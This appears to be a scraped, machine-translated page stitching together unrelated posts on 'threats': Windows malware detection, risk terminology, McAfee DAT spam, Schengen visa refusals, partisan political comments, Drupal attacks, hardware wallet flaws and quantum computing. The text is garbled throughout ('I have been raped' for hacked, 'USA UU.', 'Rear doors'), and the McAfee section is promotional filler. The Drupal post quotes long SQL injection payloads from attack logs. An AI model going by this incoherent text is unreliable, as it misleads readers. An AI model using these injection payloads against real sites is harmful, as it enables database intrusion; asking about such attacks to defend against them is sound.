malware: Windows threat detection

Is there a structured approach to perform a threat detection in Windows?

I have seen SANS offering Windows forensic education, but I can't find any good resources to start.

I know that I have been raped because ODD is happening again and again on my computer, it would take me a while to comment on every "buggie" activity my computer has been doing for a few days. Anyway, I used malwarebytes (laughs) and downloaded CrowdStrike (ordered but I can't find a way to use all the information it collects) and it seems that I'm not close to detecting what is causing these problems, I also have ProcessHacker and I check it from time to time while I am on the Network tab to see if something is happening, but I cannot assume that what I am seeing is a threat, so please let me know how to conduct a decent threat investigation on my computer

terminology: risk, threat, vulnerability with an example

Given a situation in which a system has SSL 3.0 and TLS 1.0 enabled, the following assignment would be accurate:

Weakness / vulnerability: The remote service accepts encrypted connections using TLS 1.0 and SSL 3.0.

Threat: An attacker can exploit these failures to make intermediary attacks or to decipher communications between the affected service and the clients.

Risk = Threat × Vulnerability: So, in the previous case, would we calculate the risk by observing the probability that an attacker could exploit failures in the TLS 1.0 and SSL 3.0 protocols?

Are my assumptions correct?


Online threats are evolving, so our Internet security must evolve. The Internet is full of items that are not healthy for your computers, such as viruses, malware, spyware, ransomware, etc. With hundreds of them emerging daily, sticking to their traditional antivirus programs may not be enough to deal with them. The problem effectively.

Unlike free trial versions of McAfee products, McAfee Activate exclusive product key subscriptions provide full 360 degree protection with security updates, DAT files and threat detection technology. It analyzes and blocks existing viruses and new emerging threats in the blink of an eye to close the gaps in their protection. You can activate McAfee products and updates through

Update your automatic virus detection engine with McAfee DAT files

Whether you chat, browse, buy, work or socialize, you will get the best protection available with minimal interruptions and fast scanning for infected files and malware. Enjoy features such as scans and automatic security updates while not using your computer, only schedule the scan when your PC is idle. In this way, McAfee activates protection to keep your PC's performance up to date and protects your system and network from potential online threats.

With the latest McAfee DAT updates, all information will be visible on the screen, eliminating pop-up windows and making navigation easier. Scheduled scanning and virus alerts will help you monitor your PC's performance with more attention than ever.

What is the purpose of DAT files?

McAfee DAT files contain virus signatures and other information for McAfee Activate products to help protect your devices against malicious content, ransomware threats and other potentially infected files in circulation. The file temporarily stops any active scanning process, services or other software components resident in memory that may interfere with your updates. You can download DAT files using the link McAfee also releases new DAT files to help users counter potential new threats evaluated by McAfee Labs.

How to download and install McAfee DAT files?

You must touch the latest version of the DAT file you want to download and then save the file to your desktop.

. Choose the specific file you want to download according to the edition of your McAfee product
. Generate a temporary directory on your PC. A new folder on your desk would be fine.
. Download the XDAT file from the website and save the file in a temporary folder.
. Double click on the downloaded XDAT file, start the update (the file is saved in the nnnnXDAT.EXE format, where the DAT version number is located)
. Follow the instructions on the screen

The installer does the following:

. Stops antivirus scanning or services that use your current DAT files
. Load McAfee software resident in memory
. Create a copy of the latest DAT files in the appropriate program directories.
. Obtain the application restart to continue the scanning process with the new DAT file.

Once the installer finishes updating your DAT files, you can choose to delete the downloaded file or keep it saved in case you need it for future updates.

Steve Smith, a creative person who puts his skills in technical writing by making everything easier for readers to understand the complexity of any technology related problem such as The | The | The | Activate YouTube. Many popular electronic magazines have published their articles. He has also been writing to inquiries from people related to technology.

Denial of Schengen visa due to threat to public policies, safety, health

Denial for these reasons …

One or more member states consider it a threat to the public
politics, internal security, public health as defined in article 2 (19)
of Regulation (EC) No 562/2006 (Schengen Borders Code) or the
international relations of one or more of the member states).

… means that you will need a lawyer specializing in EU law. Requesting advice from the Internet is a waste of time because the answers will be classified into one of four categories …

  • Get a lawyer
  • Do something stupid (forged passport or covert entry)
  • Jingos complaints telling you and your species to stay where you are
  • Stupid incoherent of random morons

People who have been listed as threats to the security of the area have a history that requires a long speech with a specialist and there are no other viable alternatives. The same reasoning applies to questions about the appeal of the decision. Attempting an appeal for this reason is dangerous and, in addition, runs the risk that all your things enter the public domain! See a qualified practitioner!

The professional is needed, even if the deadline for an appeal has elapsed. There are data protection laws and freedom of information laws that require local experience to navigate successfully. "Cleaning your name" is not a simple job.

Related answer: Schengen visa refusal: the justification of the purpose and conditions of the planned stay was not reliable

NOTE: To avoid the natural corollary, let's add that …

  • The consulate has already told the Department of Homeland Security in
    USA UU. that tries to mobilize;
  • The consulate has already told the other members of Schengen;
  • The consulate has informed its colonial missions abroad; Y
  • The consulate has informed the United Kingdom that it is trying to mobilize.
    and the United Kingdom in turn has informed the Republic of Ireland and the
    Commonwealth members to put a high flag in their passport.

Update April 21, 2016

The questions of phoog (whom I thank) about the possibility that this refusal arises from an erroneous identity caused an email exchange with a specialist. The result is that this reason ("One or more member states consider it a threat to public policies …") means that they had a biometric impact or some other positive conclusive coincidence. It's not like the US flight ban list where people with the same names generate confusion. Instead, it means that that person (and no one else) is in problem and it won't be fixed in the short term. Therefore, the previous answer still applies. I am taking the advanced law course in Schengen this summer and I can add another update to this answer after that.

Also note that if they cannot obtain a positive and verifiable match, they will not use this motive; instead, they will use the rejection of the Schengen visa: the justification of the purpose and the conditions of the planned stay was not reliable

Related article on how to request your transcript of the Schengen Information System: How can I find out if someone is in the Schengen Information System (SIS)? Note: Even if you find wrong information in your transcript, you will still need a skilled professional to officially delete it and restore it to its original state.

Did Trump order the murder of a foreign leader based on evidence of a threat and with an eye on domestic politics?


In fact, I'm glad you did.

Iran came in search of a fight. Iraq is only using any excuse to get rid of the US. UU. So they can go back to what they were doing before the US UU. Invade

Good for me.

Bring our troops home.

Killing the Iranian general puts the US UU. In an awkward position regarding security But our government has the right to protect our shxt.

However, Trump has an obligation to consult the Congress FIRST. Before any attack on other nations.

Is the political trial a coup d'etat or an essential American act to respond to the threat of the dictatorship?

It is none. But, Pelosi and Nadler are using it as a political weapon. "I am not in favor of dismissal without bipartisan support. It is so divisive for the country that it must have bipartisan support" … It has to be a bipartisan initiative. "- Pelosi

Yes, liar.

and Nadler …

"If you really take seriously the removal of a president from his office for serious crimes and misdemeanors, you should not do so unless you get at least a significant fraction of the people who voted for him, from the other party, agree, of reluctantly, perhaps, to accept that & # 39; yes, you had to do it & # 39 ;, otherwise you will have 20 years of recriminations. We won the election, you stole it from us. You don't want to divide the country in that way. " – Nadler

Yes, right hypocrite.

8 – MYSQL injections: Are they a threat?

For a while now, all my instances of Drupal 7 and Drupal 8 have been under constant attack from South America or Asia, where the attacker is trying to infiltrate Drupal with MySQL injections.

The attack is done by adding some MySQL queries in the and
URL: AND 8205=8205 AND (2155=2155 AND 4874=9552 AND 8205=8205') AND 5487=2530 AND ('Kcfy'='Kcfy') AND 8205=8205 AND ('nUHc'='nUHc' AND 9068=8481 AND 'wbYZ'='wbYZ' AND 8205=8205 AND 'DeAs'='DeAs' AND 7985=5834 AND '%'='' AND 8205=8205 AND '%'=' AND 5913=3547-- BaJk AND 8205=8205-- jBam
(SELECT (CASE WHEN (9523=9523) THEN 9523 ELSE 9523*(SELECT 9523 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) AND (SELECT 1687 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(1687=1687,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3698=3698 AND (SELECT 1687 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(1687=1687,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)') AND (SELECT 1687 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(1687=1687,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('XLCQ'='XLCQ' AND (SELECT 1687 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(1687=1687,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Witz'='Witz' AND (SELECT 1687 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(1687=1687,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' AND (SELECT 1687 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(1687=1687,1))),0x716b716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- OHLo AND 3711=CAST((CHR(113)||CHR(113)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3711=3711) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC) AND (3563=3563 AND 3711=CAST((CHR(113)||CHR(113)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3711=3711) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(107)||CHR(113)||CHR(107)||CHR(113)) AS NUMERIC)

Can anyone tell me what these attacks are about? Was there a mistake in Drupal that made him vulnerable to those attacks? Is anyone else experiencing those attacks?

ledger: What is the threat model of a Bitcoin HSM / Hardware wallet?

What is the threat model against which they protect and are vulnerable?

Hardware wallets are security devices with different features and hardware, but the general concept is largely identical. A reliable device has cryptographic keys, allows you to view information on a dedicated screen and accepts secure entries through its own interface (buttons or touch screen).

enter the description of the image here

In the security model of the hardware wallet, a user interacts with their untrusted host device to build a transaction by paying an amount to an address, then the transaction is sent to the hardware wallet for the assembly of the transaction, including cryptographic signatures The user is expected to verify the information displayed (that is, the amount) and recognize the transaction on their device. Each transaction needs explicit recognition on the hardware device, and the host cannot perform transactions without that approval.

This is different from the traditional software wallet model where a user interacts with an untrusted host, who by entering the encryption key for the wallet, can make any arbitrary transaction of any amount to any destination.

How much do the commonly established practices on the use of these devices improve the security of storing Bitcoin using them?

Many of the security tips given about the use of hardware wallets provide very little additional security, or only provide the illusion of security rather than really effective measures.

enter the description of the image here

A security measure that is often repeated is to verify that the address in your hardware wallet matches the one you tried to send using the companion application on the host computer. This makes no sense, since the destination address is provided by the untrusted host. The address that does not match would be an indicator of absolutely nothing but a serious failure of the software by the device.

How safe are these devices to store Bitcoin?

Maximum device security is based on trust in the manufacturer, since it is extremely easy for software errors to allow complete theft or loss of funds, and for invisible backdoors to be inserted. History has shown that many of the available devices are plagued by serious code quality problems, have bad options in building the security of their hardware and, otherwise, can be an unsafe option to store funds.

Rear doors

The backdoors in Bitcoin transactions, specifically due to some features of EDCSA, are trivial to produce and are extremely difficult to detect, especially if they are implemented sporadically. ECDSA signatures contain a number that is generated from a supposedly random source, however, if this number is designed to contain third party values, the secret private key or other information can be filtered in addition to being valid. Modern software implementations of the use of ECDSA (deterministic generation) (5) for the nonce secret value, but this is not verifiable without using the private key for validation.

Quality code

All current devices have shown serious problems with their open source ECDSA cryptography implementations, or simply have their code implementation completely closed to evade the analysis.

  1. The Bitcoin Trezor was originally shipped with an ECDSA implementation that is based on a Python library transcribed in c. This code was comically slow and exposed a (very large synchronization side channel attack) (6). Being physically close to the device while signing a transaction exposed enough information during runtime to expose private key material. Trezor has had a considerable amount of bootloader, time analysis, power analysis and hardware vulnerabilities.

  2. The Ledger Nano has an amateur time error in its bootloader that allows to completely avoid security in at least the main processor that handles user input and communication. For most microcontrollers, the memory design has repeated sections and multiple positions in which the data can be accessed, the bootloader simply did not know it and allowed arbitrary changes in the sensitive security code.

  3. The CoinKite hardware series uses micro-ecc, an abandoned "ECDSA for arduino" that contains absolutely no evidence and is vulnerable to at least one synchronization attack.

The use of a hardware wallet to store Bitcoin is not a bulletproof option, it is a considered set of security compensation that requires consideration and understanding of the threats and weaknesses of the devices.

[ Global Warming ] Open question: Do scientists have a moral obligation to clearly warn humanity of any catastrophic threat and to "say it as it is"?

More than 11,000 scientists from more than 150 countries have signed a joint declaration of a climate change emergency, citing 40 years of research showing that the world is heading towards "untold human suffering" unless steps are taken to reduce Emissions of greenhouse gases.

Quantum computing: Google's Sycamore processor has processed 2 ^ 53 states in parallel. Is this a threat to Bitcoin?

Today, it has been confirmed that Google's Sycamore quantum computer processes 53 qubits in parallel.

In practical terms, for non-quantum experts, how relevant is this progress in terms of secp256k1 and SHA256?

Does this new development arrive earlier than expected or is it within the expected quantum security margin of Bitcoin, which would have been a couple of decades before quantum computing threatens the "mathematical shields" of the cryptocurrency?

Reference: quantum computing takes flight